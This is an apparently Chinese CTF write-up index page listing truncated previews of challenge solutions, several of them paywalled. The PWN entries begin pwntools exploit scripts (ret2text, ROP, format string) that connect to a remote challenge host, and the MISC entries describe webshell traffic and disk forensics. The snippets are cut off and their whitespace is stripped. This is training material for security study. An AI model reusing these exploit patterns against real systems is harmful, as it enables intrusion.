-
ret2text
frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...
- PWN
- 2月前
-
rop32
frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...
- PWN
- 2月前
-
babyfmt
frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...
- PWN
- 2月前
-
21年羊城杯签到
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
Marco
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- Reverse
- 2月前
-
UMDCTF 2023-i-heart-wasm
我们可以在wasm二进制文件中嵌入自定义部分,并从JavaScript中访问它们。控制台输入:WebAssembly.compileStreaming(fetch("./pkg/wasm_test_bg.wasm")).then(mod=>{letflag="";for(leti=42;i>=0;i--){constsections=WebAssembly.Module.customS...
- WEB
- 2月前
-
strpos and substr
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 2月前
-
domainhackerMISC WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 2月前
-
sqlpacket.3WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 2月前
-
【2025湾区杯】checkwebshell
checkwebshellWireShark筛选HTTP包,大部分都是执行12=system("whoami");命令的,返回长度是277。所以我们按长度排序一下,把没意义的排除掉。使用这个Wireshark过滤语法http&&!(frame.len==277)找到第六个数据包,有点意思,追流,把数据复制出来。是一个PHP文件,可以观察到里面是实现了SM4算法的加密过程。里面那个注...
- MISC
- 2月前
-
【2025湾区杯】SilentMiner
SilentMiner复制到Linux机器上,挂载sudolosetup--partscan--find--showdisk.ddsudolsblk-fp/dev/loop0mkdirdisk&&sudomount-oro/dev/loop0p1~/disk1.攻击者的ip地址查看SSH日志/var/log/auth.logcat./var/log/auth.log|grep"Fa...
- MISC
- 2月前
-
zh3r0-v2 - Alice Bob Dave
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- Crypto
- 2月前
-
泄露溯源定位.2
第一问解出来皆能找到到github上搜dcf_customerhttps://github.com/Tristan-Hao/Green-Berry/blob/main/catalogue.pyflag{https://github.com/Tristan-Hao/Green-Berry/blob/main/catalogue.py}
- MISC
- 2月前
-
idekCTF2024 MemoryFS WriteUp
先nc随后执行:mkdirflag.txtmkdirflag.txt/blnflag.txtacda/brm/acd../rm/flag.txt/brm/flag.txtcreate_flagcat$PWD获取idek{***************}
- MISC
- 3月前
-
LSB1
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- MISC
- 3月前
-
trip
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- MISC
- 3月前
-
【Write Up】Crazy_Rsa_Tech
withopen('output.txt','r')asfile:exec(file.read())defexgcd(a,b):#ax+by=gcd(a,b)ifb==0:return[1,0,a]c=exgcd(b,a%b)return[c[1],c[0]-a//b*c[1],c[2]]defcrt(a,m):A=0;M=1foriinrange(len(a)):k1,k2,g=exgcd(M,...
- Crypto
- 3月前
-
【Write Up】Cycles
withopen('cycles.txt')asf:code=f.read()exec(code)p=Pct=ciphertextforainrange(p-1,(p-1)*(2**24),p-1):iflen(bin(a))>=1050:breakfromCryptodome.Util.numberimportlong_to_byteskey=long_to_bytes(a)[:16]fr...
- Crypto
- 3月前
-
【Write Up】Many Primes
withopen('output.txt','r')asf:exec(f.read())mod=1;k=nforiinrange(2,2**16):cnt=0whilek%i==0:k//=icnt+=1ifcnt>0:mod*=((i**cnt)-(i**(cnt-1)))print(f'{i}^{cnt}')print(f'mod={mod}')fromgmpy2importinvert...
- Crypto
- 3月前
-
【Write Up】pain
withopen('CROSSWD.TXT','r')asf1:dic=[word.strip()forwordinf1.readlines()]withopen('encrypted.txt','r')asf2:enc=f2.readline().strip().split()forwordinenc:now=dic.index(word)+1print(chr(now>>8),en...
- Crypto
- 3月前
